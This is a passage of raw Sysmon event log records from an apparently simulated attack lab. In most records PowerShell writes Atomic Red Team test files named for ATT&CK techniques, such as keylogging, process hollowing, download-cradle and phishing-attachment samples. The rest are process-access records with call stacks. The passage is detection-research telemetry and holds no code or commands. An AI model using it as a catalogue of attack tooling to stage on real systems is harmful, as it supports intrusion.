STEM32\ntdll.dll+51791 11241100x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.960{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.010\src\x64\T1547.dll2020-12-08 13:54:37.960 11241100x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.960{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.010\src\Win32\T1547.dll2020-12-08 13:54:37.960 11241100x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.929{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\vbsstartup.vbs2020-12-08 13:54:37.929 11241100x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.929{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\jsestartup.jse2020-12-08 13:54:37.929 11241100x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.913{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1547.001\src\batstartup.bat2020-12-08 13:54:37.913 11241100x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.882{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.011\bin\AtomicTest.exe2020-12-08 13:54:37.882 11241100x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.882{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.011\bin\AtomicTest.dll2020-12-08 13:54:37.882 11241100x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.867{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.010\bin\T1546.010x86.dll2020-12-08 13:54:37.867 11241100x80000000000000004225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.867{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1546.010\bin\T1546.010.dll2020-12-08 13:54:37.867 11241100x80000000000000004224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.820{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1543.003\bin\AtomicService.exe2020-12-08 13:54:37.820 11241100x80000000000000004223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.726{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\x64\T1218.dll2020-12-08 13:54:37.726 11241100x80000000000000004222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.710{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\Win32\T1218.dll2020-12-08 13:54:37.710 11241100x80000000000000004221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.710{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218\src\Win32\T1218-2.dll2020-12-08 13:54:37.710 11241100x80000000000000004220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.679{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.010\bin\AllTheThingsx86.dll2020-12-08 13:54:37.679 11241100x80000000000000004219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.679{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.010\bin\AllTheThingsx64.dll2020-12-08 13:54:37.679 11241100x80000000000000004218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.664{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.008\src\Win32\T1218-2.dll2020-12-08 13:54:37.664 11241100x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.648{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.007\src\x64\T1218.dll2020-12-08 13:54:37.648 11241100x80000000000000004216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.632{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.005\src\powershell.ps12020-12-08 13:54:37.632 11241100x80000000000000004215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.617{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.005\src\T1218.005.hta2020-12-08 13:54:37.617 11241100x80000000000000004214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.617{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.004\src\InstallUtilTestHarness.ps12020-12-08 13:54:37.617 11241100x80000000000000004213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.586{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1218.001\src\T1218.001.chm2020-12-08 13:54:37.586 11241100x80000000000000004212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.492{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1134.004\src\PPID-Spoof.ps12020-12-08 13:54:37.492 11241100x80000000000000004211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.492{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1134.004\bin\calc.dll2020-12-08 13:54:37.492 11241100x80000000000000004210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.476{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1127.001\src\T1127.001.csproj2020-12-08 13:54:37.476 11241100x80000000000000004209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.445{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1114.001\src\Get-Inbox.ps12020-12-08 13:54:37.445 11241100x80000000000000004208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.429{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1110.003\src\parse_net_users.bat2020-12-08 13:54:37.429 11241100x80000000000000004207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.429{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1110.002\src\sam.txt2020-12-08 13:54:37.429 11241100x80000000000000004206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.367{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1087.002\src\AdFind.exe2020-12-08 13:54:37.367 11241100x80000000000000004205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.336{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1074.001\src\Discovery.bat2020-12-08 13:54:37.336 11241100x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.336{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1074.001\bin\Folder_to_zip\T1074.txt2020-12-08 13:54:37.336 11241100x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.320{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1071.004\src\T1071-dns-domain-length.ps12020-12-08 13:54:37.320 11241100x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.320{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1071.004\src\T1071-dns-beacon.ps12020-12-08 13:54:37.320 11241100x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.273{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.005\src\sys_info.vbs2020-12-08 13:54:37.273 11241100x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.242{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.001\src\test.ps12020-12-08 13:54:37.242 11241100x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.242{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.001\src\Invoke-DownloadCradle.ps12020-12-08 13:54:37.242 11241100x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.226{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\x64\T1056.004.dll2020-12-08 13:54:37.226 11241100x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.226{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\Win32\T1056.004.dll2020-12-08 13:54:37.226 11241100x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.226{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\T1056.004\T1056.004.vcxproj2020-12-08 13:54:37.226 11241100x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.226{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\T1056.004.sln2020-12-08 13:54:37.226 11241100x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.211{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\bin\T1056.004x86.dll2020-12-08 13:54:37.211 11241100x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.211{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\bin\T1056.004x64.dll2020-12-08 13:54:37.211 11241100x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.195{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.001\src\Get-Keystrokes.ps12020-12-08 13:54:37.195 11241100x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.195{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055\src\x64\T1055.dll2020-12-08 13:54:37.195 11241100x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.195{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055\src\Win32\T1055.dll2020-12-08 13:54:37.195 11241100x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.180{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.012\src\Start-Hollow.ps12020-12-08 13:54:37.180 11241100x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.164{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\src\x64\T1055.dll2020-12-08 13:54:37.164 11241100x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:37.164{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\src\Win32\T1055.dll2020-12-08 13:54:37.164 11241100x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.148{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\bin\T1055.exe2020-12-08 13:54:37.148 11241100x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.070{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_test.bat2020-12-08 13:54:37.070 11241100x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.070{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_masquerading.vbs2020-12-08 13:54:37.070 11241100x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:37.055{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\src\T1036.003_masquerading.ps12020-12-08 13:54:37.055 11241100x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.055{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1036.003\bin\T1036.003.exe2020-12-08 13:54:37.055 11241100x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:37.024{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1027.004\bin\T1027.004_DynamicCompile.exe2020-12-08 13:54:37.024 11241100x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.210{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\used_guids.txt2020-12-08 13:54:38.210 11241100x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:38.210{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\x64\Release\atomicNotepad.dll2020-12-08 13:54:38.210 11241100x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.194{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\atomicNotepad\atomicNotepad.vcxproj2020-12-08 13:54:38.194 11241100x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.194{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\atomicNotepad.sln2020-12-08 13:54:38.194 11241100x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:38.179{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\bin\T1574.012x64.dll2020-12-08 13:54:38.179 11241100x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:38.179{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.009\bin\WindowsServiceExample.exe2020-12-08 13:54:38.179 11241100x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:38.163{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.002\bin\libcurl.dll2020-12-08 13:54:38.163 11241100x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:38.148{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.002\bin\GUP.exe2020-12-08 13:54:38.148 11241100x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.116{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1566.001\bin\PhishingAttachment.xlsm2020-12-08 13:54:38.116 11241100x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.116{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1564.004\src\test.ps12020-12-08 13:54:38.116 11241100x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:54:38.085{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1562.004\bin\AtomicTest.exe2020-12-08 13:54:38.085 11241100x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:38.054{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1559.002\src\PowerShell_Script_For_DDE_Document.ps12020-12-08 13:54:38.038 10341000x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-859F-5FCF-D700-000000009101}5096C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.615{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 